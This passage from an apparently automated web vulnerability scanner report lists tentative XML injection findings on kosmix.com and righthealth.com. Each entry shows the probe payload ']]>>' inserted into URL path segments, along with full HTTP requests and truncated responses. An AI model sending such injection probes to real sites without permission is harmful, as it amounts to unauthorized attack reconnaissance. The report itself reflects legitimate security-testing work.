<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.77. http://www.kosmix.com/images/mpv.txt [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/mpv.txt

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/mpv.txt?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&v=29&vt=any&pt=o&abt=82.YES*89.YES*25.YES*108.mashup*100.NO*92.NO*26.NO*15.NO*2.NO*60.NO*99.images_r2_msn*110.YES*97.NO*102.UP*78.YES*17.YES*35.NO*98.YES*75.NO*104.YES*106.YES*72.YES*86.YES*76.YES*58.YES*70.YES*71.YES*81.YES*96.YES*21.NO*88.YES*63.NO*109.NT*83.NO*16.YES*91.SNIP*74.NO*87.NO*84.YES*107.YES*68.YES*93.YES*77.NO*101.YES*62.BELOW*61.LEFT*67.YES*40.FIVE*103.NO*57.NO*66.YES*94.NO*80.NO*95.YES*53.YES*59.NO*85.FOUR*55.YES*20.NO&m=nfooter+x0+y896+w1120+h168+an+r1010200+c1+i31+rt10&e_pt=corp&e_at_st=May+15+13%3A00%3A43.273911&e_at_et=May+15+13%3A00%3A43.281166&e_madsense_headish=0&e_page_quality_score=0 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; __qca=P0-1290282890-1305489649089

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:14:50 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:14:50 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:16:50 GMT;path=/
Content-Length: 17055

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.78. http://www.kosmix.com/images/mpv.txt [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/mpv.txt

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/mpv.txt]]>>?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&v=29&vt=any&pt=o&abt=82.YES*89.YES*25.YES*108.mashup*100.NO*92.NO*26.NO*15.NO*2.NO*60.NO*99.images_r2_msn*110.YES*97.NO*102.UP*78.YES*17.YES*35.NO*98.YES*75.NO*104.YES*106.YES*72.YES*86.YES*76.YES*58.YES*70.YES*71.YES*81.YES*96.YES*21.NO*88.YES*63.NO*109.NT*83.NO*16.YES*91.SNIP*74.NO*87.NO*84.YES*107.YES*68.YES*93.YES*77.NO*101.YES*62.BELOW*61.LEFT*67.YES*40.FIVE*103.NO*57.NO*66.YES*94.NO*80.NO*95.YES*53.YES*59.NO*85.FOUR*55.YES*20.NO&m=nfooter+x0+y896+w1120+h168+an+r1010200+c1+i31+rt10&e_pt=corp&e_at_st=May+15+13%3A00%3A43.273911&e_at_et=May+15+13%3A00%3A43.281166&e_madsense_headish=0&e_page_quality_score=0 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; __qca=P0-1290282890-1305489649089

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:11 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:11 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:11 GMT;path=/
Content-Length: 17080

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.79. http://www.kosmix.com/images/pv.txt [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/pv.txt

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/pv.txt?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&sv=1220494746&q=&sr=organic&br=Chrome&os=Windows&ur=http%3A//www.kosmix.com/&rf=&sw=1920&sh=1200&vw=1136&vh=945&v=29&rs=May+15+13%3A00%3A43.165997&bid=152138&rid=GAMMA.REL.BLD.20110412 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:08 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:08 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:08 GMT;path=/
Content-Length: 16708

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.80. http://www.kosmix.com/images/pv.txt [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/pv.txt

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/pv.txt]]>>?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&sv=1220494746&q=&sr=organic&br=Chrome&os=Windows&ur=http%3A//www.kosmix.com/&rf=&sw=1920&sh=1200&vw=1136&vh=945&v=29&rs=May+15+13%3A00%3A43.165997&bid=152138&rid=GAMMA.REL.BLD.20110412 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:27 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:27 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:27 GMT;path=/
Content-Length: 16731

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.81. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/options_bottom-kosmix-sem-chimborazo-152138.js?1302902896 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:12 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:12 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:12 GMT;path=/
Content-Length: 15931

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.82. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_bottom-kosmix-sem-chimborazo-152138.js?1304862030 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:56 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:55 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:55 GMT;path=/
Content-Length: 16390

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.83. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js?1302902897 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:12 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:12 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:12 GMT;path=/
Content-Length: 15935

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.84. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_top-s_kosmix-chimborazo-152138.js?1302902895 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:37 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:37 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:37 GMT;path=/
Content-Length: 16367

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.85. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /stylesheets]]>>/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css?1304450611 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:04:41 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=stylesheets%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:04:41 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:06:41 GMT;path=/
Content-Length: 15934

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.86. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /c-javascripts]]>>/kapp_relevance.js?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:40 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:40 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:40 GMT;path=/
Content-Length: 20500

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.87. http://www.righthealth.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /c-javascripts/kapp_relevance.js]]>>?1288734473 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:09 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:09 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:23:09 GMT;path=/
Content-Length: 20520

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.88. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/health/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:28 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:28 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:28 GMT;path=/
Content-Length: 20296

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.89. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/health]]>>/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:59 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:59 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:59 GMT;path=/
Content-Length: 20291

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.90. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/health/favicon.ico]]>> HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

